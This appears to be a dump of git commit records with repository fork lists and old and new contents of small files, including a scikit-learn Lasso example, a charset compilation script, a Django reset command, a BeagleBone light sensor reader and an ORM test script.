n,ephes/scikit-learn,gotomypc/scikit-learn,zihua/scikit-learn,wanggang3333/scikit-learn,DonBeo/scikit-learn,loli/semisupervisedforests,samuel1208/scikit-learn,raghavrv/scikit-learn,cdegroc/scikit-learn,liyu1990/sklearn,ngoix/OCRF,ldirer/scikit-learn,beepee14/scikit-learn,aabadie/scikit-learn,lenovor/scikit-learn,zorojean/scikit-learn,zaxtax/scikit-learn,giorgiop/scikit-learn,sonnyhu/scikit-learn,Windy-Ground/scikit-learn,Clyde-fare/scikit-learn,jseabold/scikit-learn,cybernet14/scikit-learn,RayMick/scikit-learn,joernhees/scikit-learn,shangwuhencc/scikit-learn,henrykironde/scikit-learn,UNR-AERIAL/scikit-learn,jmschrei/scikit-learn,cauchycui/scikit-learn,Fireblend/scikit-learn,theoryno3/scikit-learn,3manuek/scikit-learn,rexshihaoren/scikit-learn,cainiaocome/scikit-learn,jaidevd/scikit-learn,CforED/Machine-Learning,aminert/scikit-learn,michigraber/scikit-learn,khkaminska/scikit-learn,costypetrisor/scikit-learn,schets/scikit-learn,mxjl620/scikit-learn,henrykironde/scikit-learn,massmutual/scikit-learn,rahul-c1/scikit-learn,lin-credible/scikit-learn,terkkila/scikit-learn,kaichogami/scikit-learn,equialgo/scikit-learn,Achuth17/scikit-learn,hainm/scikit-learn,vibhorag/scikit-learn,fyffyt/scikit-learn,mhue/scikit-learn,kashif/scikit-learn,xiaoxiamii/scikit-learn,yunfeilu/scikit-learn,jlegendary/scikit-learn,sanketloke/scikit-learn,stylianos-kampakis/scikit-learn,poryfly/scikit-learn,ssaeger/scikit-learn,pypot/scikit-learn,DSLituiev/scikit-learn,arabenjamin/scikit-learn,stylianos-kampakis/scikit-learn,ClimbsRocks/scikit-learn,bthirion/scikit-learn,yonglehou/scikit-learn,hlin117/scikit-learn,tdhopper/scikit-learn,Vimos/scikit-learn,themrmax/scikit-learn,rsivapr/scikit-learn,jblackburne/scikit-learn,qifeigit/scikit-learn,bigdataelephants/scikit-learn,zhenv5/scikit-learn,larsmans/scikit-learn,fbagirov/scikit-learn,frank-tancf/scikit-learn,loli/semisupervisedforests,IndraVikas/scikit-learn,fabioticconi/scikit-learn,evgchz/scikit-learn,jakirkham/scikit-learn,glouppe/scikit-learn,afl
axman/scikit-learn,Titan-C/scikit-learn,tawsifkhan/scikit-learn,mattilyra/scikit-learn,terkkila/scikit-learn,RachitKansal/scikit-learn,shahankhatch/scikit-learn,quheng/scikit-learn,nrhine1/scikit-learn,0asa/scikit-learn,Barmaley-exe/scikit-learn,wanggang3333/scikit-learn,hsiaoyi0504/scikit-learn,aetilley/scikit-learn,aewhatley/scikit-learn,kaichogami/scikit-learn,fabioticconi/scikit-learn,mblondel/scikit-learn,hdmetor/scikit-learn,abhishekgahlot/scikit-learn,rohanp/scikit-learn,tomlof/scikit-learn,ashhher3/scikit-learn,bigdataelephants/scikit-learn,kylerbrown/scikit-learn,ningchi/scikit-learn,UNR-AERIAL/scikit-learn,mattgiguere/scikit-learn,Srisai85/scikit-learn,nvoron23/scikit-learn,lazywei/scikit-learn,B3AU/waveTree,vermouthmjl/scikit-learn,jm-begon/scikit-learn,sergeyf/scikit-learn,gclenaghan/scikit-learn,NunoEdgarGub1/scikit-learn,Akshay0724/scikit-learn,vortex-ape/scikit-learn,pratapvardhan/scikit-learn,xiaoxiamii/scikit-learn,ldirer/scikit-learn,trungnt13/scikit-learn,B3AU/waveTree,xyguo/scikit-learn,mlyundin/scikit-learn,abhishekkrthakur/scikit-learn,treycausey/scikit-learn,procoder317/scikit-learn,huobaowangxi/scikit-learn,3manuek/scikit-learn,yonglehou/scikit-learn,ZENGXH/scikit-learn,Vimos/scikit-learn,liangz0707/scikit-learn,gclenaghan/scikit-learn,abimannans/scikit-learn,Fireblend/scikit-learn,dingocuster/scikit-learn,mrshu/scikit-learn,billy-inn/scikit-learn,ephes/scikit-learn,chrisburr/scikit-learn,AnasGhrab/scikit-learn,fabianp/scikit-learn,jkarnows/scikit-learn,wlamond/scikit-learn,NelisVerhoef/scikit-learn,0asa/scikit-learn,mxjl620/scikit-learn,h2educ/scikit-learn,ahoyosid/scikit-learn,shenzebang/scikit-learn,schets/scikit-learn,quheng/scikit-learn,wanggang3333/scikit-learn,siutanwong/scikit-learn,meduz/scikit-learn,IndraVikas/scikit-learn,ycaihua/scikit-learn,hitszxp/scikit-learn,massmutual/scikit-learn,samuel1208/scikit-learn,mlyundin/scikit-learn,rajat1994/scikit-learn,kaichogami/scikit-learn,sumspr/scikit-learn,jzt5132/scikit-learn,hsuantien/sci
kit-learn,vermouthmjl/scikit-learn,lbishal/scikit-learn,loli/semisupervisedforests,OshynSong/scikit-learn,luo66/scikit-learn,kashif/scikit-learn,Garrett-R/scikit-learn,pythonvietnam/scikit-learn,sarahgrogan/scikit-learn,mattilyra/scikit-learn,shahankhatch/scikit-learn,huobaowangxi/scikit-learn,xyguo/scikit-learn,mxjl620/scikit-learn,anntzer/scikit-learn,meduz/scikit-learn,shyamalschandra/scikit-learn,cwu2011/scikit-learn,TomDLT/scikit-learn,mrshu/scikit-learn,amueller/scikit-learn,maheshakya/scikit-learn,glemaitre/scikit-learn,siutanwong/scikit-learn,BiaDarkia/scikit-learn,victorbergelin/scikit-learn,Garrett-R/scikit-learn,Clyde-fare/scikit-learn,ngoix/OCRF,aabadie/scikit-learn,henridwyer/scikit-learn,PatrickOReilly/scikit-learn,yanlend/scikit-learn,jmetzen/scikit-learn,PrashntS/scikit-learn,alexeyum/scikit-learn,vinayak-mehta/scikit-learn,cybernet14/scikit-learn,gclenaghan/scikit-learn,yunfeilu/scikit-learn,Nyker510/scikit-learn,alexeyum/scikit-learn,mwv/scikit-learn,chrsrds/scikit-learn,fzalkow/scikit-learn,shangwuhencc/scikit-learn,trankmichael/scikit-learn,fyffyt/scikit-learn,beepee14/scikit-learn,ltiao/scikit-learn,ilyes14/scikit-learn,mhdella/scikit-learn,jakirkham/scikit-learn,shangwuhencc/scikit-learn,bnaul/scikit-learn,moutai/scikit-learn,dhruv13J/scikit-learn,herilalaina/scikit-learn,chrsrds/scikit-learn,hlin117/scikit-learn,ilyes14/scikit-learn,r-mart/scikit-learn,jm-begon/scikit-learn,0x0all/scikit-learn,ashhher3/scikit-learn,raghavrv/scikit-learn,appapantula/scikit-learn,kylerbrown/scikit-learn,mugizico/scikit-learn,mjgrav2001/scikit-learn,djgagne/scikit-learn,loli/sklearn-ensembletrees,hsiaoyi0504/scikit-learn,hainm/scikit-learn,Akshay0724/scikit-learn,ankurankan/scikit-learn,kylerbrown/scikit-learn,depet/scikit-learn,victorbergelin/scikit-learn,gotomypc/scikit-learn,anntzer/scikit-learn,appapantula/scikit-learn,treycausey/scikit-learn,MatthieuBizien/scikit-learn,florian-f/sklearn,xavierwu/scikit-learn,ilyes14/scikit-learn,sonnyhu/scikit-learn,JPFranco
ia/scikit-learn,nelson-liu/scikit-learn,manhhomienbienthuy/scikit-learn,xiaoxiamii/scikit-learn,arjoly/scikit-learn,michigraber/scikit-learn,RachitKansal/scikit-learn,ChanChiChoi/scikit-learn,giorgiop/scikit-learn,sumspr/scikit-learn,theoryno3/scikit-learn,zaxtax/scikit-learn,maheshakya/scikit-learn,JeanKossaifi/scikit-learn,NunoEdgarGub1/scikit-learn,jseabold/scikit-learn,anurag313/scikit-learn,jmetzen/scikit-learn,aminert/scikit-learn,ningchi/scikit-learn,aflaxman/scikit-learn,AnasGhrab/scikit-learn,sergeyf/scikit-learn,Adai0808/scikit-learn,Titan-C/scikit-learn,waterponey/scikit-learn,xwolf12/scikit-learn,qifeigit/scikit-learn,shusenl/scikit-learn,RachitKansal/scikit-learn,bikong2/scikit-learn,cauchycui/scikit-learn,xyguo/scikit-learn,costypetrisor/scikit-learn,evgchz/scikit-learn,moutai/scikit-learn,aflaxman/scikit-learn,justincassidy/scikit-learn,eickenberg/scikit-learn,loli/sklearn-ensembletrees,espg/scikit-learn,ngoix/OCRF,hitszxp/scikit-learn,jereze/scikit-learn,nmayorov/scikit-learn,rishikksh20/scikit-learn,rahul-c1/scikit-learn,Barmaley-exe/scikit-learn,jpautom/scikit-learn,massmutual/scikit-learn,YinongLong/scikit-learn,RPGOne/scikit-learn,LohithBlaze/scikit-learn,PatrickChrist/scikit-learn,3manuek/scikit-learn,chrisburr/scikit-learn,HolgerPeters/scikit-learn,ogrisel/scikit-learn,MohammedWasim/scikit-learn,ephes/scikit-learn,ChanderG/scikit-learn,appapantula/scikit-learn,jmschrei/scikit-learn,ankurankan/scikit-learn,jorge2703/scikit-learn,vibhorag/scikit-learn,elkingtonmcb/scikit-learn,mojoboss/scikit-learn,glemaitre/scikit-learn,vinayak-mehta/scikit-learn,dhruv13J/scikit-learn,madjelan/scikit-learn,anntzer/scikit-learn,liangz0707/scikit-learn,zorroblue/scikit-learn,anirudhjayaraman/scikit-learn,thilbern/scikit-learn,Obus/scikit-learn,JsNoNo/scikit-learn,altairpearl/scikit-learn,beepee14/scikit-learn,AlexanderFabisch/scikit-learn,AlexRobson/scikit-learn,mhue/scikit-learn,russel1237/scikit-learn,hainm/scikit-learn,DonBeo/scikit-learn,cainiaocome/scikit-lea
rn,robbymeals/scikit-learn,arjoly/scikit-learn,henrykironde/scikit-learn,ElDeveloper/scikit-learn,kashif/scikit-learn,cwu2011/scikit-learn,joernhees/scikit-learn,idlead/scikit-learn,olologin/scikit-learn,sgenoud/scikit-learn,smartscheduling/scikit-learn-categorical-tree,mfjb/scikit-learn,pompiduskus/scikit-learn,rvraghav93/scikit-learn,pkruskal/scikit-learn,lin-credible/scikit-learn,chrisburr/scikit-learn,sumspr/scikit-learn,liberatorqjw/scikit-learn,themrmax/scikit-learn,Obus/scikit-learn,IssamLaradji/scikit-learn,carrillo/scikit-learn,ltiao/scikit-learn,hrjn/scikit-learn,alvarofierroclavero/scikit-learn,samzhang111/scikit-learn,marcocaccin/scikit-learn,mehdidc/scikit-learn,pompiduskus/scikit-learn,anirudhjayaraman/scikit-learn,Barmaley-exe/scikit-learn,shikhardb/scikit-learn,btabibian/scikit-learn,Fireblend/scikit-learn,mugizico/scikit-learn,huzq/scikit-learn,hlin117/scikit-learn,eg-zhang/scikit-learn,nelson-liu/scikit-learn,LiaoPan/scikit-learn,treycausey/scikit-learn,robin-lai/scikit-learn,aabadie/scikit-learn,sergeyf/scikit-learn,hrjn/scikit-learn,untom/scikit-learn,mikebenfield/scikit-learn,kmike/scikit-learn,kaichogami/scikit-learn,0asa/scikit-learn,alexsavio/scikit-learn,rahuldhote/scikit-learn,loli/sklearn-ensembletrees,IshankGulati/scikit-learn,costypetrisor/scikit-learn,jaidevd/scikit-learn,nhejazi/scikit-learn,lucidfrontier45/scikit-learn,ilo10/scikit-learn,liberatorqjw/scikit-learn,henridwyer/scikit-learn,mjudsp/Tsallis,yask123/scikit-learn,mhue/scikit-learn,jakobworldpeace/scikit-learn,Obus/scikit-learn,jkarnows/scikit-learn,rahul-c1/scikit-learn,hdmetor/scikit-learn,dhruv13J/scikit-learn,florian-f/sklearn,jkarnows/scikit-learn,poryfly/scikit-learn,fengzhyuan/scikit-learn,h2educ/scikit-learn,joshloyal/scikit-learn,jjx02230808/project0223,fyffyt/scikit-learn,amueller/scikit-learn,dsullivan7/scikit-learn,AlexandreAbraham/scikit-learn,fbagirov/scikit-learn,harshaneelhg/scikit-learn,pythonvietnam/scikit-learn,etkirsch/scikit-learn,bhargav/scikit-learn,Adai
0808/scikit-learn,cainiaocome/scikit-learn,tdhopper/scikit-learn,manashmndl/scikit-learn,nhejazi/scikit-learn,jmschrei/scikit-learn,imaculate/scikit-learn,sergeyf/scikit-learn,rexshihaoren/scikit-learn,manashmndl/scikit-learn,andaag/scikit-learn,xzh86/scikit-learn,AlexanderFabisch/scikit-learn,Sentient07/scikit-learn,lazywei/scikit-learn,kevin-intel/scikit-learn,andrewnc/scikit-learn,roxyboy/scikit-learn,samzhang111/scikit-learn,etkirsch/scikit-learn,jereze/scikit-learn,hsuantien/scikit-learn,florian-f/sklearn,adamgreenhall/scikit-learn,NelisVerhoef/scikit-learn,michigraber/scikit-learn,fbagirov/scikit-learn,Akshay0724/scikit-learn,arahuja/scikit-learn,jaidevd/scikit-learn,thilbern/scikit-learn,rahuldhote/scikit-learn,pratapvardhan/scikit-learn,LiaoPan/scikit-learn,NunoEdgarGub1/scikit-learn,pkruskal/scikit-learn,nomadcube/scikit-learn,pianomania/scikit-learn,Clyde-fare/scikit-learn,abimannans/scikit-learn,beepee14/scikit-learn,hdmetor/scikit-learn,clemkoa/scikit-learn,spallavolu/scikit-learn,Lawrence-Liu/scikit-learn,ssaeger/scikit-learn,dsullivan7/scikit-learn,IndraVikas/scikit-learn,vibhorag/scikit-learn,trankmichael/scikit-learn,billy-inn/scikit-learn,betatim/scikit-learn,sarahgrogan/scikit-learn,russel1237/scikit-learn,espg/scikit-learn,moutai/scikit-learn,shikhardb/scikit-learn,mjudsp/Tsallis,glennq/scikit-learn,ChanChiChoi/scikit-learn,aewhatley/scikit-learn,jereze/scikit-learn,madjelan/scikit-learn,nomadcube/scikit-learn,murali-munna/scikit-learn,andaag/scikit-learn,cl4rke/scikit-learn,lucidfrontier45/scikit-learn,heli522/scikit-learn,tosolveit/scikit-learn,robin-lai/scikit-learn,ankurankan/scikit-learn,Myasuka/scikit-learn,shenzebang/scikit-learn,Djabbz/scikit-learn,krez13/scikit-learn,jblackburne/scikit-learn,shenzebang/scikit-learn,bikong2/scikit-learn,evgchz/scikit-learn,xzh86/scikit-learn,lesteve/scikit-learn,aabadie/scikit-learn,IssamLaradji/scikit-learn,amueller/scikit-learn,shyamalschandra/scikit-learn,kagayakidan/scikit-learn,LohithBlaze/scikit-lear
n,walterreade/scikit-learn,ky822/scikit-learn,jblackburne/scikit-learn,mrshu/scikit-learn,alexsavio/scikit-learn,UNR-AERIAL/scikit-learn,jorik041/scikit-learn,pv/scikit-learn,henridwyer/scikit-learn,zuku1985/scikit-learn,manashmndl/scikit-learn,Aasmi/scikit-learn,voxlol/scikit-learn,mfjb/scikit-learn,JeanKossaifi/scikit-learn,nrhine1/scikit-learn,cl4rke/scikit-learn,mikebenfield/scikit-learn,glennq/scikit-learn,gotomypc/scikit-learn,kmike/scikit-learn,larsmans/scikit-learn,lesteve/scikit-learn,r-mart/scikit-learn,jjx02230808/project0223,hugobowne/scikit-learn,IndraVikas/scikit-learn,MartinSavc/scikit-learn,ky822/scikit-learn,jayflo/scikit-learn,arahuja/scikit-learn,depet/scikit-learn,jayflo/scikit-learn,CVML/scikit-learn,massmutual/scikit-learn,justincassidy/scikit-learn,jm-begon/scikit-learn,shusenl/scikit-learn,idlead/scikit-learn,larsmans/scikit-learn,MartinDelzant/scikit-learn,zihua/scikit-learn,florian-f/sklearn,petosegan/scikit-learn,jorge2703/scikit-learn,xzh86/scikit-learn,lesteve/scikit-learn,sumspr/scikit-learn,ahoyosid/scikit-learn,AnasGhrab/scikit-learn,Srisai85/scikit-learn,rajat1994/scikit-learn,kjung/scikit-learn,scikit-learn/scikit-learn,mattgiguere/scikit-learn,alvarofierroclavero/scikit-learn,abhishekgahlot/scikit-learn,AIML/scikit-learn,deepesch/scikit-learn,mojoboss/scikit-learn,fabianp/scikit-learn,pkruskal/scikit-learn,zaxtax/scikit-learn,samuel1208/scikit-learn,phdowling/scikit-learn,untom/scikit-learn,mattilyra/scikit-learn,dsquareindia/scikit-learn,ChanderG/scikit-learn,MechCoder/scikit-learn,abhishekgahlot/scikit-learn,davidgbe/scikit-learn,ltiao/scikit-learn,marcocaccin/scikit-learn,shahankhatch/scikit-learn,nrhine1/scikit-learn,procoder317/scikit-learn,eickenberg/scikit-learn,pv/scikit-learn,vigilv/scikit-learn,MohammedWasim/scikit-learn,eickenberg/scikit-learn,zhenv5/scikit-learn,nelson-liu/scikit-learn,kmike/scikit-learn,BiaDarkia/scikit-learn | examples/linear_model/lasso_dense_vs_sparse_data.py | 
examples/linear_model/lasso_dense_vs_sparse_data.py | """
==============================
Lasso on dense and sparse data
==============================
We show that linear_model.Lasso and linear_model.sparse.Lasso
provide the same results and that in the case of
sparse data linear_model.sparse.Lasso improves the speed.
"""
print __doc__

from time import time
import numpy as np
from scipy import sparse
from scipy import linalg

from sklearn.linear_model.sparse import Lasso as SparseLasso
from sklearn.linear_model import Lasso as DenseLasso


###############################################################################
# The two Lasso implementations on Dense data
print "--- Dense matrices"

# Random wide problem (many more features than samples), seeded so repeated
# runs give identical timings/coefficients.
n_samples, n_features = 200, 10000
np.random.seed(0)
y = np.random.randn(n_samples)
X = np.random.randn(n_samples, n_features)

alpha = 1
sparse_lasso = SparseLasso(alpha=alpha, fit_intercept=False, max_iter=1000)
dense_lasso = DenseLasso(alpha=alpha, fit_intercept=False, max_iter=1000)

t0 = time()
sparse_lasso.fit(X, y)
print "Sparse Lasso done in %fs" % (time() - t0)

t0 = time()
dense_lasso.fit(X, y)
print "Dense Lasso done in %fs" % (time() - t0)

# Both solvers should converge to (numerically) the same solution.
print "Distance between coefficients : %s" % linalg.norm(sparse_lasso.coef_
                                                         - dense_lasso.coef_)

###############################################################################
# The two Lasso implementations on Sparse data
print "--- Sparse matrices"

# Sparsify X by zeroing everything below 2.5, then convert to CSC — the
# layout the sparse coordinate-descent solver works on.
Xs = X.copy()
Xs[Xs < 2.5] = 0.0
Xs = sparse.coo_matrix(Xs)
Xs = Xs.tocsc()

print "Matrix density : %s %%" % (Xs.nnz / float(X.size) * 100)

alpha = 0.1
sparse_lasso = SparseLasso(alpha=alpha, fit_intercept=False, max_iter=1000)
dense_lasso = DenseLasso(alpha=alpha, fit_intercept=False, max_iter=1000)

t0 = time()
sparse_lasso.fit(Xs, y)
print "Sparse Lasso done in %fs" % (time() - t0)

t0 = time()
# Fit the dense estimator on a densified copy of the same data for a fair
# coefficient comparison.
dense_lasso.fit(Xs.todense(), y)
print "Dense Lasso done in %fs" % (time() - t0)

print "Distance between coefficients : %s" % linalg.norm(sparse_lasso.coef_
                                                         - dense_lasso.coef_)
| """
==============================
Lasso on dense and sparse data
==============================
We show that linear_model.Lasso and linear_model.sparse.Lasso
provide the same results and that in the case of
sparse data linear_model.sparse.Lasso improves the speed.
"""
# NOTE(review): Python 2 syntax (print statements) and the long-removed
# sklearn.linear_model.sparse module; kept verbatim for historical reference.
# In this variant max_iter is passed to fit() rather than the constructor.
print __doc__
from time import time
import numpy as np
from scipy import sparse
from scipy import linalg
from sklearn.linear_model.sparse import Lasso as SparseLasso
from sklearn.linear_model import Lasso as DenseLasso
###############################################################################
# The two Lasso implementations on Dense data
print "--- Dense matrices"
n_samples, n_features = 200, 10000
# Fixed seed so both runs below see the same random problem.
np.random.seed(0)
y = np.random.randn(n_samples)
X = np.random.randn(n_samples, n_features)
alpha = 1
sparse_lasso = SparseLasso(alpha=alpha, fit_intercept=False)
dense_lasso = DenseLasso(alpha=alpha, fit_intercept=False)
# Time both implementations on the same dense problem.
t0 = time()
sparse_lasso.fit(X, y, max_iter=1000)
print "Sparse Lasso done in %fs" % (time() - t0)
t0 = time()
dense_lasso.fit(X, y, max_iter=1000)
print "Dense Lasso done in %fs" % (time() - t0)
# Both solvers should converge to (nearly) the same coefficients.
print "Distance between coefficients : %s" % linalg.norm(sparse_lasso.coef_
- dense_lasso.coef_)
###############################################################################
# The two Lasso implementations on Sparse data
print "--- Sparse matrices"
Xs = X.copy()
# Zero out every entry below 2.5 so the matrix becomes mostly empty.
Xs[Xs < 2.5] = 0.0
Xs = sparse.coo_matrix(Xs)
Xs = Xs.tocsc()
print "Matrix density : %s %%" % (Xs.nnz / float(X.size) * 100)
alpha = 0.1
sparse_lasso = SparseLasso(alpha=alpha, fit_intercept=False)
dense_lasso = DenseLasso(alpha=alpha, fit_intercept=False)
t0 = time()
sparse_lasso.fit(Xs, y, max_iter=1000)
print "Sparse Lasso done in %fs" % (time() - t0)
t0 = time()
# The dense solver gets the densified copy of the same sparse matrix.
dense_lasso.fit(Xs.todense(), y, max_iter=1000)
print "Dense Lasso done in %fs" % (time() - t0)
print "Distance between coefficients : %s" % linalg.norm(sparse_lasso.coef_
- dense_lasso.coef_)
| bsd-3-clause | Python |
35e30faabc3fd7ca68b7b28c9fd5b7a4c15b0e21 | add charset compilation script | jaames/kakimasu,jaames/kakimasu,jaames/kakimasu,jaames/kakimasu | util/charset.py | util/charset.py | # charset.py - lazy utility script for compiling character svgs, animation data and details into a single .json
# charset.py - lazy utility script that bundles character svgs, animation
# timings and metadata into one compiled .json file
#
# Usage:
#   python charset.py [charset directory]
#
# The charset directory must contain:
#   - 'base.json': an array with one object per character, holding
#       - id
#       - romaji (name/pronunciation of the character in the Latin alphabet)
#       - timings (array of per-path stroke timings)
#   - an 'svg' directory with one [character id].svg file per character
#
# Example charset: https://github.com/jaames/kakimasu/tree/master/charsets/hiragana

from os.path import splitext
from sys import argv
import xml.etree.ElementTree as ET
import json

# Namespace map so ElementTree can resolve the svg: prefix in find()
# ref: https://docs.python.org/3/library/xml.etree.elementtree.html#parsing-xml-with-namespaces
SVG_NS = {"svg": "http://www.w3.org/2000/svg"}

charset_dir = argv[1]

with open(charset_dir + "/base.json") as base_file:
    char_map = json.load(base_file)

for entry in char_map:
    doc = ET.parse(charset_dir + "/svg/" + entry["id"] + ".svg")
    # first child of the first <g> group holds the stroke paths
    stroke_group = doc.getroot().find("svg:g", SVG_NS)[0]
    # lazy fallback to a flat 100-per-stroke timing list when none is defined
    stroke_timings = entry.get("timings", [100] * 16)
    # pair every svg path (d) with its stroke timing (t)
    entry["paths"] = [
        {"d": stroke.attrib["d"], "t": stroke_timings[index]}
        for index, stroke in enumerate(stroke_group)
    ]
    # the raw timings array is not wanted in the compiled output
    entry.pop("timings", None)

with open(charset_dir + "/compiled.json", "w") as compiled_file:
    compiled_file.write(json.dumps(char_map, sort_keys=True))

print("Finished compiling " + charset_dir)
| mit | Python | |
0d9613a1410aad150ccaf4b828971ec6f9e31520 | Create lang.py | jmister28/GitZip,jmister28/GitZip | lang.py | lang.py | mit | Python | ||
2f268173e25bee5d671583bb905829e0ffd4f631 | Add management command to clear all matches mostly useful with heroku | maxf/address-matcher,maxf/address-matcher,maxf/address-matcher,maxf/address-matcher | match/management/commands/reset-matches.py | match/management/commands/reset-matches.py | from django.core.management.base import BaseCommand, CommandError
from match.models import Match
import sys
class Command(BaseCommand):
    """Management command that wipes every Match row from the database."""
    # One-line description shown by `manage.py help reset-matches`.
    help = 'Reset all match data'
    def handle(self, *args, **options):
        """Delete all stored Match objects (irreversible)."""
        Match.objects.all().delete()
732eee568f19ed2e63f357b62fa539ff50a1c046 | add program to display light readings in terminal in inf loop | davidbradway/beaglebone-python | light.py | light.py | #!/usr/bin/python
"""
light.py
Read analog values from the photoresistor
=======
run with:
sudo ./light.py
Copyright 2014 David P. Bradway (dpb6@duke.edu)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__author__ = "David Bradway"
__email__ = "dpb6@duke.edu"
__license__ = "Apache v2.0"
def main():
    """Continuously sample the photoresistor pin and print each reading."""
    import Adafruit_BBIO.ADC as ADC
    import time

    # analog input pin on the BeagleBone header wired to the photoresistor
    sensor_pin = 'P9_40'
    ADC.setup()
    print('Reading\t\tVolts')
    while True:
        fraction = ADC.read(sensor_pin)
        # scale the reading to volts; 1.800 is presumably the ADC reference
        # voltage in volts -- confirm against board docs
        voltage = fraction * 1.800
        print('%f\t%f' % (fraction, voltage))
        # sample once per second
        time.sleep(1)


if __name__ == "__main__":
    main()
591bdcbfb80927d0ffb4922eb684fe7ce17c5456 | Add manage.py | gmuthetatau/zoohackathon2016,gmuthetatau/zoohackathon2016,gmuthetatau/zoohackathon2016 | web/zoohackathon2016/manage.py | web/zoohackathon2016/manage.py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    # Point Django at this project's settings module before dispatching.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "zoohackathon2016.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError:
        # The above import may fail for some other reason. Ensure that the
        # issue is really that Django is missing to avoid masking other
        # exceptions on Python 2.
        try:
            import django
        except ImportError:
            raise ImportError(
                "Couldn't import Django. Are you sure it's installed and "
                "available on your PYTHONPATH environment variable? Did you "
                "forget to activate a virtual environment?"
            )
        raise
    # Hand the raw command-line arguments to Django's management dispatcher.
    execute_from_command_line(sys.argv)
cb26da63add95ebf9e7aa84a381293dd80f433cb | add test_db, test is OK | haibo-yu/awesome-python-webapp,haibo-yu/awesome-python-webapp,haibo-yu/awesome-python-webapp | www/test_db.py | www/test_db.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Haibo-Yu'
# Smoke test for the ORM in transwarp.db: insert a User, look it up by
# email, delete it, then repeat the lookup. Python 2 script.
from models import User, Blog, Comment
from transwarp import db
# NOTE(review): credentials are hard-coded for the local dev database.
db.create_engine(user='www-data', password='www-data', database='awesome')
# Insert a new user row and echo the id generated for it.
u = User(name='Test', email='test@example.com', password='1234567890', image='about:blank')
u.insert()
print 'new user id:', u.id
# The row should now be retrievable by email.
u1 = User.find_first('where email=?', 'test@example.com')
print 'find user\'s name:', u1.name
u1.delete()
# After deletion the same query should no longer find the row
# (presumably prints None -- confirm against find_first's contract).
u2 = User.find_first('where email=?', 'test@example.com')
print 'find user:', u2
ad5b3a334203394792c90b0d1bfe2dda8efe13b3 | add admin interface for tracking logs | prarthitm/edxplatform,cecep-edu/edx-platform,ferabra/edx-platform,ubc/edx-platform,msegado/edx-platform,louyihua/edx-platform,mjg2203/edx-platform-seas,mjirayu/sit_academy,chrisndodge/edx-platform,utecuy/edx-platform,rationalAgent/edx-platform-custom,kalebhartje/schoolboost,beacloudgenius/edx-platform,SivilTaram/edx-platform,eestay/edx-platform,sameetb-cuelogic/edx-platform-test,cselis86/edx-platform,shashank971/edx-platform,etzhou/edx-platform,naresh21/synergetics-edx-platform,prarthitm/edxplatform,edx-solutions/edx-platform,mitocw/edx-platform,valtech-mooc/edx-platform,CourseTalk/edx-platform,zubair-arbi/edx-platform,tanmaykm/edx-platform,Ayub-Khan/edx-platform,utecuy/edx-platform,doganov/edx-platform,DNFcode/edx-platform,jamiefolsom/edx-platform,xinjiguaike/edx-platform,motion2015/edx-platform,nagyistoce/edx-platform,gsehub/edx-platform,kmoocdev2/edx-platform,vasyarv/edx-platform,abdoosh00/edraak,zerobatu/edx-platform,SivilTaram/edx-platform,benpatterson/edx-platform,kamalx/edx-platform,Shrhawk/edx-platform,4eek/edx-platform,olexiim/edx-platform,ovnicraft/edx-platform,halvertoluke/edx-platform,pepeportela/edx-platform,Edraak/edraak-platform,simbs/edx-platform,hkawasaki/kawasaki-aio8-2,unicri/edx-platform,shashank971/edx-platform,beacloudgenius/edx-platform,yokose-ks/edx-platform,proversity-org/edx-platform,Ayub-Khan/edx-platform,doismellburning/edx-platform,PepperPD/edx-pepper-platform,antoviaque/edx-platform,ubc/edx-platform,martynovp/edx-platform,DNFcode/edx-platform,cognitiveclass/edx-platform,nagyistoce/edx-platform,CourseTalk/edx-platform,naresh21/synergetics-edx-platform,gymnasium/edx-platform,jruiperezv/ANALYSE,valtech-mooc/edx-platform,jbzdak/edx-platform,kxliugang/edx-platform,kursitet/edx-platform,kmoocdev/edx-platform,EduPepperPDTesting/pepper2013-testing,mtlchun/edx,andyzsf/edx,shubhdev/edx-platform,dsajkl/123,JioEducation/edx-platform,DNFcode/edx-platform,bdero/edx-pla
tform,alexthered/kienhoc-platform,IITBinterns13/edx-platform-dev,Edraak/edraak-platform,hkawasaki/kawasaki-aio8-0,B-MOOC/edx-platform,nanolearning/edx-platform,nttks/jenkins-test,caesar2164/edx-platform,unicri/edx-platform,adoosii/edx-platform,jamesblunt/edx-platform,nanolearningllc/edx-platform-cypress,ferabra/edx-platform,shurihell/testasia,SivilTaram/edx-platform,EduPepperPDTesting/pepper2013-testing,wwj718/edx-platform,appliedx/edx-platform,jamiefolsom/edx-platform,eduNEXT/edx-platform,xingyepei/edx-platform,zofuthan/edx-platform,cognitiveclass/edx-platform,motion2015/edx-platform,marcore/edx-platform,teltek/edx-platform,ampax/edx-platform,sudheerchintala/LearnEraPlatForm,jruiperezv/ANALYSE,jbzdak/edx-platform,PepperPD/edx-pepper-platform,Livit/Livit.Learn.EdX,IndonesiaX/edx-platform,jbzdak/edx-platform,louyihua/edx-platform,fly19890211/edx-platform,doismellburning/edx-platform,devs1991/test_edx_docmode,halvertoluke/edx-platform,martynovp/edx-platform,nanolearning/edx-platform,Softmotions/edx-platform,pelikanchik/edx-platform,auferack08/edx-platform,appliedx/edx-platform,jswope00/GAI,ZLLab-Mooc/edx-platform,eduNEXT/edx-platform,Shrhawk/edx-platform,ahmedaljazzar/edx-platform,hastexo/edx-platform,raccoongang/edx-platform,msegado/edx-platform,jamesblunt/edx-platform,10clouds/edx-platform,bitifirefly/edx-platform,bigdatauniversity/edx-platform,PepperPD/edx-pepper-platform,shurihell/testasia,y12uc231/edx-platform,rue89-tech/edx-platform,bdero/edx-platform,rhndg/openedx,LICEF/edx-platform,mbareta/edx-platform-ft,EDUlib/edx-platform,CourseTalk/edx-platform,LICEF/edx-platform,alexthered/kienhoc-platform,rismalrv/edx-platform,ampax/edx-platform-backup,hkawasaki/kawasaki-aio8-1,a-parhom/edx-platform,Semi-global/edx-platform,carsongee/edx-platform,syjeon/new_edx,nanolearning/edx-platform,yokose-ks/edx-platform,nttks/edx-platform,jazkar